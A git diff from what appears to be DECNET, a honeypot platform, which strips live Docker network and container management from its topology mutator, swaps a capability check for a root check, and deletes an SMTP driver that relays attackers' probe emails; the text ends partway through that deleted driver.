_log.error(
|
||||
"live add_decky: compose up failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
return False
|
||||
|
||||
|
||||
async def _materialise_decky_remove(
|
||||
repo: Any, topology_id: str, decky_name: str, services: list[str],
|
||||
) -> None:
|
||||
"""compose stop + rm -f for one decky's containers, then re-render."""
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return
|
||||
import anyio
|
||||
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||
|
||||
targets = _decky_targets(decky_name, services)
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
|
||||
# longer mentions the decky, so a stop run AFTER rendering would
|
||||
# find no service to act on.
|
||||
try:
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("stop", *targets, compose_file=compose_path),
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
try:
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_connect(
|
||||
repo: Any, topology_id: str,
|
||||
decky_name: str, lan_name: str, ipv4_address: str,
|
||||
) -> None:
|
||||
"""SDK ``network.connect`` to multi-home a running base container.
|
||||
|
||||
Service containers share the base's netns via ``network_mode:
|
||||
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
|
||||
the base alone gives every service container the new interface for
|
||||
free — we don't need to iterate.
|
||||
"""
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return
|
||||
import docker
|
||||
from decnet.topology.compose import _container_name, _network_name
|
||||
|
||||
net_name = _network_name(topology_id, lan_name)
|
||||
container_name = _container_name(topology_id, decky_name)
|
||||
try:
|
||||
client = docker.from_env()
|
||||
net = client.networks.get(net_name)
|
||||
container = client.containers.get(container_name)
|
||||
net.connect(container, ipv4_address=ipv4_address)
|
||||
except docker.errors.APIError as exc:
|
||||
# Idempotency — already on the network is fine.
|
||||
msg = str(exc).lower()
|
||||
if "already" in msg or "endpoint" in msg and "exists" in msg:
|
||||
_log.info(
|
||||
"live attach_decky: %s already on network %s — skipping",
|
||||
container_name, net_name,
|
||||
)
|
||||
else:
|
||||
_log.error(
|
||||
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
|
||||
topology_id, decky_name, lan_name, exc,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.error(
|
||||
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||
topology_id, decky_name, lan_name, exc,
|
||||
)
|
||||
await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_disconnect(
|
||||
repo: Any, topology_id: str, decky_name: str, lan_name: str,
|
||||
) -> None:
|
||||
"""SDK ``network.disconnect`` to drop a multi-home edge."""
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return
|
||||
import docker
|
||||
from decnet.topology.compose import _container_name, _network_name
|
||||
|
||||
net_name = _network_name(topology_id, lan_name)
|
||||
container_name = _container_name(topology_id, decky_name)
|
||||
try:
|
||||
client = docker.from_env()
|
||||
net = client.networks.get(net_name)
|
||||
container = client.containers.get(container_name)
|
||||
net.disconnect(container)
|
||||
except docker.errors.APIError as exc:
|
||||
msg = str(exc).lower()
|
||||
if "not connected" in msg or "no such" in msg:
|
||||
_log.info(
|
||||
"live detach_decky: %s already off network %s — skipping",
|
||||
container_name, net_name,
|
||||
)
|
||||
else:
|
||||
_log.error(
|
||||
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
|
||||
topology_id, decky_name, lan_name, exc,
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.error(
|
||||
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
|
||||
topology_id, decky_name, lan_name, exc,
|
||||
)
|
||||
await _rerender_compose(repo, topology_id)
|
||||
|
||||
|
||||
async def _materialise_decky_services_diff(
|
||||
repo: Any, topology_id: str,
|
||||
decky_name: str,
|
||||
added: list[str],
|
||||
removed: list[str],
|
||||
) -> None:
|
||||
"""Add/remove per-service containers without touching siblings.
|
||||
|
||||
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
|
||||
without coupling the mutator to that module — service mutations
|
||||
routed via the mutator queue publish ``mutation.applied`` while the
|
||||
direct API publishes ``decky.<name>.service_added``; they share
|
||||
machinery, not control flow.
|
||||
"""
|
||||
if not added and not removed:
|
||||
return
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return
|
||||
import anyio
|
||||
from decnet.engine.deployer import _compose, _topology_compose_path
|
||||
|
||||
await _rerender_compose(repo, topology_id)
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
|
||||
if add_targets:
|
||||
try:
|
||||
await _compose_up_with_buildkit_fallback(
|
||||
"up", "-d", "--no-deps", "--build", *add_targets,
|
||||
compose_file=compose_path,
|
||||
label=f"live update_decky add topology={topology_id} decky={decky_name}",
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.error(
|
||||
"live update_decky add: compose up failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
rm_targets = _decky_targets(decky_name, list(removed))[1:]
|
||||
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
|
||||
if not rm_targets:
|
||||
break
|
||||
try:
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live update_decky %s failed topology=%s decky=%s: %s",
|
||||
action_name, topology_id, decky_name, exc,
|
||||
)
|
||||
|
||||
|
||||
async def _materialise_decky_recreate_base(
|
||||
repo: Any, topology_id: str, decky_name: str,
|
||||
) -> None:
|
||||
"""Force-recreate just the base container (used for forwards_l3 flips).
|
||||
|
||||
DESTRUCTIVE: kills any in-container state on the base. Service
|
||||
containers re-attach via ``network_mode: service:<base>`` after the
|
||||
base is rebuilt. Caller is responsible for gating this on an
|
||||
explicit operator-supplied ``force=true`` flag.
|
||||
"""
|
||||
if await _live_topology_or_none(repo, topology_id) is None:
|
||||
return
|
||||
import anyio
|
||||
from decnet.engine.deployer import (
|
||||
_compose_with_retry, _topology_compose_path,
|
||||
)
|
||||
await _rerender_compose(repo, topology_id)
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
try:
|
||||
await anyio.to_thread.run_sync(
|
||||
lambda: _compose_with_retry(
|
||||
"up", "-d", "--no-deps", "--force-recreate", decky_name,
|
||||
compose_file=compose_path,
|
||||
),
|
||||
)
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.error(
|
||||
"live update_decky recreate_base failed topology=%s decky=%s: %s",
|
||||
topology_id, decky_name, exc,
|
||||
)
|
||||
|
||||
|
||||
# ------------------------------------------------------------------- ops
|
||||
|
||||
|
||||
@@ -588,16 +131,6 @@ async def apply_add_lan(
|
||||
"y": payload.get("y"),
|
||||
}
|
||||
)
|
||||
|
||||
# Live materialisation: when the topology is active/degraded, create
|
||||
# the docker bridge network now and re-render the per-topology
|
||||
# compose file so subsequent ``apply_add_decky`` writes a coherent
|
||||
# services map. Pending topologies skip this — the next deploy
|
||||
# creates everything from scratch. Agent-pinned topologies also
|
||||
# skip; live editing on agents is its own routing problem.
|
||||
await _materialise_lan_change(
|
||||
repo, topology_id, created=(name, subnet, is_dmz),
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -617,17 +150,7 @@ async def apply_remove_lan(
|
||||
f"LAN {lan['name']!r} is the home LAN of decky "
|
||||
f"{d['decky_config']['name']!r}; remove the decky first"
|
||||
)
|
||||
lan_name = lan["name"]
|
||||
# enforce_pending=False: the mutator queue is the live-editing
|
||||
# surface, gated on topology status by us before we got here. The
|
||||
# repo's pending-only guard is for HTTP CRUD callers that mustn't
|
||||
# bypass it.
|
||||
await repo.delete_lan(lan["id"], enforce_pending=False)
|
||||
|
||||
# Live materialisation symmetric to apply_add_lan: tear down the
|
||||
# docker bridge and re-render compose so a future redeploy doesn't
|
||||
# try to wire deckies into a network that no longer exists.
|
||||
await _materialise_lan_change(repo, topology_id, removed=lan_name)
|
||||
await repo.delete_lan(lan["id"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -681,12 +204,11 @@ async def apply_add_decky(
|
||||
if forwards_l3:
|
||||
decky_config["forwards_l3"] = True
|
||||
|
||||
services_list = list(payload.get("services", []))
|
||||
decky_uuid = await repo.add_topology_decky(
|
||||
{
|
||||
"topology_id": topology_id,
|
||||
"name": name,
|
||||
"services": services_list,
|
||||
"services": list(payload.get("services", [])),
|
||||
"decky_config": decky_config,
|
||||
"x": payload.get("x"),
|
||||
"y": payload.get("y"),
|
||||
@@ -701,25 +223,6 @@ async def apply_add_decky(
|
||||
"forwards_l3": forwards_l3,
|
||||
}
|
||||
)
|
||||
# Live materialisation: spawn the new decky's containers without
|
||||
# touching siblings. Skips on pending / agent-pinned topologies —
|
||||
# see _live_topology_or_none.
|
||||
spawned = await _materialise_decky_spawn(
|
||||
repo, topology_id, name, services_list,
|
||||
)
|
||||
# Flip the row's state to 'running' on success so the dashboard's
|
||||
# ACTIVE DECKIES count reflects reality. Without this the row
|
||||
# stays at the default 'pending' forever; the deployer's full
|
||||
# post-deploy reconcile only runs on a fresh deploy_topology.
|
||||
if spawned:
|
||||
try:
|
||||
await repo.update_topology_decky(decky_uuid, {"state": "running"})
|
||||
except Exception as exc: # noqa: BLE001
|
||||
_log.warning(
|
||||
"live add_decky: state flip to running failed "
|
||||
"topology=%s decky=%s: %s",
|
||||
topology_id, name, exc,
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -783,16 +286,6 @@ async def apply_attach_decky(
|
||||
"forwards_l3": forwards_l3,
|
||||
}
|
||||
)
|
||||
# Live materialisation: SDK network.connect on the base container.
|
||||
# Service containers share the base's netns via network_mode:
|
||||
# service:<base>, so they inherit the new interface — only the base
|
||||
# needs the connect.
|
||||
await _materialise_decky_connect(
|
||||
repo, topology_id,
|
||||
decky_name=decky["decky_config"]["name"],
|
||||
lan_name=lan["name"],
|
||||
ipv4_address=ip,
|
||||
)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -836,15 +329,7 @@ async def apply_detach_decky(
|
||||
await repo.update_topology_decky(
|
||||
decky["uuid"], {"decky_config": new_cfg}
|
||||
)
|
||||
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
|
||||
# Live materialisation: SDK network.disconnect on the base
|
||||
# container. Service containers automatically lose visibility into
|
||||
# the LAN because they share the base's netns.
|
||||
await _materialise_decky_disconnect(
|
||||
repo, topology_id,
|
||||
decky_name=decky["decky_config"]["name"],
|
||||
lan_name=lan["name"],
|
||||
)
|
||||
await repo.delete_topology_edge(edge["id"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -855,15 +340,7 @@ async def apply_remove_decky(
|
||||
decky = _decky_by_name(hydrated, payload["decky"])
|
||||
if decky is None:
|
||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||
decky_name = decky["decky_config"]["name"]
|
||||
services_list = list(decky.get("services") or [])
|
||||
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
|
||||
# Live materialisation: stop + rm -f the decky's containers. We
|
||||
# capture decky_name + services BEFORE the delete so the helper
|
||||
# has the targets even though the row is gone.
|
||||
await _materialise_decky_remove(
|
||||
repo, topology_id, decky_name, services_list,
|
||||
)
|
||||
await repo.delete_topology_decky(decky["uuid"])
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -877,136 +354,31 @@ async def apply_update_decky(
|
||||
``patch`` — dict merged into existing ``decky_config``.
|
||||
``services`` — replacement top-level services list.
|
||||
``x``,``y`` — layout coords.
|
||||
``force`` — opt-in for destructive recreates (currently
|
||||
required when ``forwards_l3`` flips on a
|
||||
live topology — see below).
|
||||
|
||||
Live materialisation strategy:
|
||||
|
||||
* **services changed** → diff old vs new; ``compose up -d`` for
|
||||
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
|
||||
direct API path (services_live) without coupling.
|
||||
* **forwards_l3 flipped** → port publishing changes, which docker
|
||||
can only apply at container-create time. Requires recreating
|
||||
the base — destructive (kills in-container state, drops active
|
||||
sessions). Gated on ``payload['force'] is True``; otherwise we
|
||||
raise ``MutationError`` so a half-thinking operator doesn't
|
||||
stomp a live decky.
|
||||
* **only coords (x/y)** → DB-only. No docker work.
|
||||
"""
|
||||
hydrated = await _hydrated(repo, topology_id)
|
||||
decky = _decky_by_name(hydrated, payload["decky"])
|
||||
if decky is None:
|
||||
raise MutationError(f"decky {payload['decky']!r} not found")
|
||||
|
||||
# Capture pre-state so we can compute the diff after the DB write.
|
||||
old_services = list(decky.get("services") or [])
|
||||
old_cfg = decky.get("decky_config") or {}
|
||||
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
|
||||
|
||||
patch: dict[str, Any] = {}
|
||||
new_decky_config = old_cfg
|
||||
if payload.get("patch"):
|
||||
new_decky_config = {**old_cfg, **payload["patch"]}
|
||||
patch["decky_config"] = new_decky_config
|
||||
new_services = old_services
|
||||
merged = dict(decky["decky_config"])
|
||||
merged.update(payload["patch"])
|
||||
patch["decky_config"] = merged
|
||||
if "services" in payload:
|
||||
new_services = list(payload["services"])
|
||||
patch["services"] = new_services
|
||||
patch["services"] = list(payload["services"])
|
||||
for key in ("x", "y"):
|
||||
if key in payload:
|
||||
patch[key] = payload[key]
|
||||
if not patch:
|
||||
return
|
||||
|
||||
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
|
||||
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
|
||||
|
||||
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
|
||||
# 'gateway' semantic specifically means 'host-port publisher facing
|
||||
# the DMZ' — running it on an internal LAN publishes ports the
|
||||
# outside world can't reach and shadows the host's port space.
|
||||
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
|
||||
# the generator/attach paths, not by this op, so this check only
|
||||
# fires when the operator explicitly toggles the flag.
|
||||
if forwards_l3_flipped and new_forwards_l3:
|
||||
# Re-derive the home LAN from the edges; same logic as
|
||||
# check_gateway_homed_in_dmz.
|
||||
decky_uuid = decky["uuid"]
|
||||
home_lan_id: Optional[str] = None
|
||||
for e in hydrated["edges"]:
|
||||
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
|
||||
home_lan_id = e["lan_id"]
|
||||
break
|
||||
if home_lan_id is None:
|
||||
for e in hydrated["edges"]:
|
||||
if e["decky_uuid"] == decky_uuid:
|
||||
home_lan_id = e["lan_id"]
|
||||
break
|
||||
home_lan = next(
|
||||
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
|
||||
None,
|
||||
)
|
||||
if home_lan is None or not home_lan.get("is_dmz"):
|
||||
home_name = home_lan["name"] if home_lan else "(unknown)"
|
||||
raise MutationError(
|
||||
f"cannot promote decky {decky['decky_config']['name']!r} "
|
||||
f"to gateway: home LAN {home_name!r} is not a DMZ. "
|
||||
"Move the decky to the DMZ first, or pick a different decky."
|
||||
)
|
||||
|
||||
# Pre-check the destructive flip BEFORE any DB write, so a refused
|
||||
# mutation leaves zero side-effects.
|
||||
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
|
||||
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
|
||||
raise MutationError(
|
||||
f"forwards_l3 flip on live decky "
|
||||
f"{decky['decky_config']['name']!r} requires force=true; "
|
||||
"this will recreate the base container and drop in-container state"
|
||||
)
|
||||
|
||||
await repo.update_topology_decky(decky["uuid"], patch)
|
||||
|
||||
# Materialisation — only when the topology is actually live.
|
||||
# _live_topology_or_none was already called above; calling the
|
||||
# individual helpers re-checks (cheap) so they stay self-contained.
|
||||
decky_name = decky["decky_config"]["name"]
|
||||
added = sorted(set(new_services) - set(old_services))
|
||||
removed = sorted(set(old_services) - set(new_services))
|
||||
if added or removed:
|
||||
await _materialise_decky_services_diff(
|
||||
repo, topology_id, decky_name, added, removed,
|
||||
)
|
||||
if forwards_l3_flipped:
|
||||
# force was checked above; reaching here means the operator
|
||||
# opted in. recreate_base re-renders compose first so the
|
||||
# rebuilt base picks up the new `ports:` block.
|
||||
await _materialise_decky_recreate_base(
|
||||
repo, topology_id, decky_name,
|
||||
)
|
||||
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
async def apply_update_lan(
|
||||
repo: Any, topology_id: str, payload: dict[str, Any]
|
||||
) -> None:
|
||||
"""Update LAN fields — subnet, is_dmz, coords, rename.
|
||||
|
||||
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
|
||||
Live deckies bind to the bridge with IPs allocated from the old
|
||||
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
|
||||
flag, which docker can't change on a network with active
|
||||
containers). Reject those mutations on active/degraded topologies
|
||||
rather than rewriting the DB into an incoherent state.
|
||||
|
||||
Coord-only updates (``x``/``y``) are layout-only; let them through
|
||||
unconditionally. Renames pass through too — the bridge's docker
|
||||
name is keyed off ``_network_name(topology_id, lan_name)``, so a
|
||||
rename would also need a rebuild — but rename isn't currently a
|
||||
code path on active topologies; if the operator hits it we still
|
||||
write the row and let the next deploy reconcile.
|
||||
"""
|
||||
"""Update LAN fields — subnet, is_dmz, coords, rename."""
|
||||
hydrated = await _hydrated(repo, topology_id)
|
||||
lan = _lan_by_name(hydrated, payload["name"])
|
||||
if lan is None:
|
||||
@@ -1017,17 +389,6 @@ async def apply_update_lan(
|
||||
fields[key] = payload[key]
|
||||
if not fields:
|
||||
return
|
||||
|
||||
topology = await repo.get_topology(topology_id)
|
||||
is_live = bool(topology) and topology.status in ("active", "degraded")
|
||||
if is_live:
|
||||
hostile = {"subnet", "is_dmz"} & fields.keys()
|
||||
if hostile:
|
||||
raise MutationError(
|
||||
f"cannot change {sorted(hostile)} on a deployed LAN; "
|
||||
f"teardown + redeploy required"
|
||||
)
|
||||
|
||||
await repo.update_lan(lan["id"], fields)
|
||||
await _assert_valid_after(repo, topology_id)
|
||||
|
||||
|
||||
@@ -151,20 +151,11 @@ def _ensure_network(
|
||||
options.update(extra_options)
|
||||
|
||||
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
|
||||
# networks.list() doesn't populate Containers — reload to get the
|
||||
# full inspect payload (including connected container IDs).
|
||||
try:
|
||||
net.reload()
|
||||
except docker.errors.APIError:
|
||||
pass
|
||||
|
||||
if net.attrs.get("Driver") == driver:
|
||||
# Same driver — but if the IPAM pool drifted (different subnet,
|
||||
# gateway, or ip-range than this deploy asks for), reusing it
|
||||
# hands out addresses from the old pool and we race the real LAN.
|
||||
# Compare and rebuild on mismatch — but only when no containers
|
||||
# are attached. With active endpoints Docker refuses the remove
|
||||
# with 403; just attach to the existing network instead.
|
||||
# Compare and rebuild on mismatch.
|
||||
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
|
||||
cur = pools[0] if pools else {}
|
||||
if (
|
||||
@@ -173,15 +164,8 @@ def _ensure_network(
|
||||
and cur.get("IPRange") == ip_range
|
||||
):
|
||||
return # right driver AND matching pool, leave it alone
|
||||
if net.attrs.get("Containers"):
|
||||
# Active endpoints — can't safely rebuild. Attach to the
|
||||
# existing network; IPAM drift on ip_range only affects
|
||||
# Docker's auto-assign pool, which DECNET doesn't use
|
||||
# (IPs are always set explicitly in the compose file).
|
||||
return
|
||||
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
|
||||
# Disconnect any live containers first so `remove()` doesn't
|
||||
# refuse with ErrNetworkInUse.
|
||||
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
|
||||
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
|
||||
for cid in (net.attrs.get("Containers") or {}):
|
||||
try:
|
||||
net.disconnect(cid, force=True)
|
||||
@@ -319,44 +303,11 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
|
||||
# Host-side macvlan interface (hairpin fix)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
# Linux capability bit positions — see capabilities(7).
|
||||
_CAP_NET_ADMIN = 12
|
||||
|
||||
|
||||
def _has_cap_net_admin() -> bool:
|
||||
"""True if the current process holds CAP_NET_ADMIN in its effective set.
|
||||
|
||||
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
|
||||
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
|
||||
bit 12 is CAP_NET_ADMIN.
|
||||
"""
|
||||
try:
|
||||
with open("/proc/self/status", "r") as fh:
|
||||
for line in fh:
|
||||
if line.startswith("CapEff:"):
|
||||
bits = int(line.split()[1], 16)
|
||||
return bool(bits & (1 << _CAP_NET_ADMIN))
|
||||
except OSError:
|
||||
pass
|
||||
return False
|
||||
|
||||
|
||||
def _require_net_admin() -> None:
|
||||
"""Reject early if the process can't run ``ip link add ... macvlan``.
|
||||
|
||||
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
|
||||
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
|
||||
but not necessary. Prefer the cap check so the systemd unit's
|
||||
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
|
||||
whole API to run as root.
|
||||
"""
|
||||
if os.geteuid() == 0 or _has_cap_net_admin():
|
||||
return
|
||||
raise PermissionError(
|
||||
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
|
||||
"Either run as root or grant the cap (systemd: "
|
||||
"AmbientCapabilities=CAP_NET_ADMIN)."
|
||||
)
|
||||
def _require_root() -> None:
|
||||
if os.geteuid() != 0:
|
||||
raise PermissionError(
|
||||
"MACVLAN host-side interface setup requires root. Run with sudo."
|
||||
)
|
||||
|
||||
|
||||
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
|
||||
@@ -366,9 +317,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
||||
host-helper first: the two drivers can share a parent NIC on paper but
|
||||
leaving the opposite helper in place is just cruft after a driver swap.
|
||||
"""
|
||||
_require_net_admin()
|
||||
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
_require_root()
|
||||
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
|
||||
@@ -383,7 +332,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
|
||||
|
||||
|
||||
def teardown_host_macvlan(decky_ip_range: str) -> None:
|
||||
_require_net_admin()
|
||||
_require_root()
|
||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
|
||||
@@ -395,9 +344,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
||||
host-helper first so a prior macvlan deploy doesn't leave its slave
|
||||
dangling on the parent NIC after the driver swap.
|
||||
"""
|
||||
_require_net_admin()
|
||||
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
_require_root()
|
||||
|
||||
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
|
||||
|
||||
@@ -411,7 +358,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
|
||||
|
||||
|
||||
def teardown_host_ipvlan(decky_ip_range: str) -> None:
|
||||
_require_net_admin()
|
||||
_require_root()
|
||||
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
|
||||
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
|
||||
|
||||
@@ -431,47 +378,3 @@ def ips_to_range(ips: list[str]) -> str:
|
||||
strict=False,
|
||||
)
|
||||
return str(network)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Container veth resolution (for tc netem tarpit)
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
def get_container_pid(container_name: str) -> int:
|
||||
"""Return the PID of a running container's init process."""
|
||||
client = docker.from_env()
|
||||
try:
|
||||
container = client.containers.get(container_name)
|
||||
except docker.errors.NotFound:
|
||||
raise LookupError(f"container {container_name!r} not found")
|
||||
pid = container.attrs["State"]["Pid"]
|
||||
if not pid:
|
||||
raise LookupError(f"container {container_name!r} is not running (PID=0)")
|
||||
return pid
|
||||
|
||||
|
||||
def get_container_veth(container_name: str) -> str:
|
||||
"""Return the host veth interface name paired to container_name's eth0.
|
||||
|
||||
Reads /sys/class/net/eth0/iflink from inside the container to get the
|
||||
peer interface index, then matches it against ``ip link show`` on the host.
|
||||
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
|
||||
"""
|
||||
result = _run(
|
||||
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
|
||||
check=False,
|
||||
)
|
||||
if result.returncode != 0:
|
||||
raise LookupError(
|
||||
f"container {container_name!r} not reachable: {result.stderr.strip()}"
|
||||
)
|
||||
peer_index = result.stdout.strip()
|
||||
links = _run(["ip", "link", "show"])
|
||||
for line in links.stdout.splitlines():
|
||||
if line.startswith(f"{peer_index}:"):
|
||||
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
|
||||
iface = line.split(":")[1].strip().split("@")[0]
|
||||
return iface
|
||||
raise LookupError(
|
||||
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
|
||||
)
|
||||
|
||||
@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
|
||||
try:
|
||||
from decnet.orchestrator.emailgen.scheduler import EmailAction
|
||||
except ImportError: # pragma: no cover - scheduler always exists
|
||||
EmailAction = None # type: ignore[assignment, misc]
|
||||
EmailAction = None # type: ignore[assignment]
|
||||
if EmailAction is not None and isinstance(action, EmailAction):
|
||||
from decnet.orchestrator.drivers.email import EmailDriver
|
||||
return EmailDriver()
|
||||
|
||||
@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
|
||||
"""Convenience accessor for telemetry / logging."""
|
||||
return self._llm.model
|
||||
|
||||
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
|
||||
async def run(self, action: EmailAction) -> ActivityResult:
|
||||
return await self._run_email(action)
|
||||
|
||||
async def _run_email(self, action: EmailAction) -> ActivityResult:
|
||||
|
||||
@@ -1,80 +0,0 @@
|
||||
"""SMTP probe-relay driver.
|
||||
|
||||
Forwards the attacker's first probe email via the master's real internet
|
||||
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
|
||||
the master (where this worker runs) does.
|
||||
|
||||
Called by the realism worker's smtp probe listener, not the main tick loop.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import email
|
||||
import smtplib
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
|
||||
|
||||
|
||||
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
|
||||
"""Return body with a From: header added if one is absent."""
|
||||
try:
|
||||
msg = email.message_from_bytes(body)
|
||||
except Exception:
|
||||
return body
|
||||
if msg["From"]:
|
||||
return body
|
||||
# Prepend the header before the existing content.
|
||||
header_line = f"From: {mail_from}\r\n".encode()
|
||||
return header_line + body
|
||||
|
||||
|
||||
def forward_probe(
|
||||
*,
|
||||
svc_cfg: dict[str, Any],
|
||||
stored_as: str,
|
||||
decky_name: str,
|
||||
mail_from: str,
|
||||
rcpt_to: list[str],
|
||||
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
|
||||
) -> tuple[bool, str]:
|
||||
"""Read the .eml from disk and forward it via the upstream relay.
|
||||
|
||||
Returns (True, "") on success or (False, reason) on failure.
|
||||
Always safe to call in a thread — uses only blocking I/O.
|
||||
"""
|
||||
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
|
||||
if not upstream_host:
|
||||
return False, "upstream_host not configured"
|
||||
|
||||
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
|
||||
try:
|
||||
body = eml_path.read_bytes()
|
||||
except OSError as exc:
|
||||
return False, f"cannot read eml: {exc}"
|
||||
|
||||
if not rcpt_to:
|
||||
return False, "no recipients"
|
||||
|
||||
upstream_port = int(svc_cfg.get("upstream_port") or 25)
|
||||
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
|
||||
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
|
||||
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
|
||||
|
||||
# Ensure the message has a From: header so mail clients show the attacker's
|
||||
# address rather than falling back to the envelope sender (upstream_sender).
|
||||
# Minimal relay-test scripts often omit headers entirely.
|
||||
body = _ensure_from_header(body, mail_from)
|
||||
|
||||
try:
|
||||
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
|
||||
conn.ehlo()
|
||||
if conn.has_extn("STARTTLS"):
|
||||
conn.starttls()
|
||||
conn.ehlo()
|
||||
if upstream_user and upstream_pass:
|
||||
conn.login(upstream_user, upstream_pass)
